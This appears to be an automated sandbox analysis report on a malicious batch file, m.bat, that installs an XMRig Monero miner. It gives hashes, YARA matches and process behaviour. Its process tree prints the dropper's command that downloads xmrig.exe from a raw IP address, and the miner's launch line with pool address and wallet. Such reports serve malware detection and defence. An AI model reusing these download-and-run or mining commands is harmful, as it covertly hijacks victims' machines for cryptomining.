xmrig | fcfc2d821e4cedc13f162bbc7e27ace7fad087046839a7e0578b7e6e0971b054

General

Target

m.bat
Size

575B
MD5

314bf6fe07c827eb48fc609927c375a6
SHA1

3d568a6c03cec34e127bf0496f418a11643419a9
SHA256

fcfc2d821e4cedc13f162bbc7e27ace7fad087046839a7e0578b7e6e0971b054
SHA512

c87b2b76a94f3c58f78a98bf2621db41537bd302fa1a2c171b797d54d046871a8a103b99e0b5569d0c285bb69292b1b0d6960cb894cd7484af3c50638d4a62bb

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral2/files/0x00080000000231e8-7.dat	family_xmrig
behavioral2/files/0x00080000000231e8-7.dat	xmrig
behavioral2/memory/1636-10-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-11-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-13-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-15-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-16-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-17-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-18-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-19-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-20-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-21-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-22-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-23-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-24-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig
behavioral2/memory/1636-25-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
4468	c.exe
1636	xmrm.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
660	Process not Found

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1636	xmrm.exe
Token: SeLockMemoryPrivilege	1636	xmrm.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1636	xmrm.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4016 wrote to memory of 4468	4016	cmd.exe	82
PID 4016 wrote to memory of 4468	4016	cmd.exe	82
PID 4016 wrote to memory of 1636	4016	cmd.exe	85
PID 4016 wrote to memory of 1636	4016	cmd.exe	85

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\m.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4016
- \??\c:\xmrm\c.exe
  c -s -o xmrm.exe http://5.42.65.68/xmrig.exe
  2⤵
  - Executes dropped EXE
  PID:4468
- \??\c:\xmrm\xmrm.exe
  xmrm.exe --coin=XMR -a randomx --cpu-priority=2 --cpu-max-threads-hint=50 -o xmr.2miners.com:2222 -u 49kEH5Z7crFcFk3jtyqRVrag52eNpTextWp3gqqENM2TdpCRkB8GdYE37jSN4SXoBwXpi8xk5SfG6iTvDyzGmtexQwLPjig.ohdigaujyczomnlzxoocgcgnvjstku -p x
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1636

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\xmrm\c.exe

Filesize
411KB

MD5
1c3645ebddbe2da6a32a5f9fb43a3c23

SHA1
086f74a35d5afed78ae50cf5586fafffb7845464

SHA256
0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

SHA512
ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

Download Submit
C:\xmrm\xmrm.exe

Filesize
7.9MB

MD5
4813fa6d610e180b097eae0ce636d2aa

SHA1
1e9cd17ea32af1337dd9a664431c809dd8a64d76

SHA256
9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc

SHA512
5463e61b9583dd7e73fc4c0f14252ce06bb1b24637fdf5c4b96b3452cf486b147c980e365ca6633d89e7cfe245131f528a7ecab2340251cef11cdeb49dac36aa

Download Submit
\??\c:\xmrm\c.exe

Filesize
411KB

MD5
1c3645ebddbe2da6a32a5f9fb43a3c23

SHA1
086f74a35d5afed78ae50cf5586fafffb7845464

SHA256
0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

SHA512
ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

Download Submit
memory/1636-15-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-17-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-10-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-11-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-12-0x00000162A85F0000-0x00000162A8610000-memory.dmp

Filesize
128KB

Download
memory/1636-13-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-14-0x00000162A85F0000-0x00000162A8610000-memory.dmp

Filesize
128KB

Download
memory/1636-8-0x00000162A85A0000-0x00000162A85C0000-memory.dmp

Filesize
128KB

Download
memory/1636-16-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-9-0x00000162A9DD0000-0x00000162A9E10000-memory.dmp

Filesize
256KB

Download
memory/1636-18-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-19-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-20-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-21-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-22-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-23-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-24-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download
memory/1636-25-0x00007FF6324C0000-0x00007FF632FC3000-memory.dmp

Filesize
11.0MB

Download

Analysis

Sharing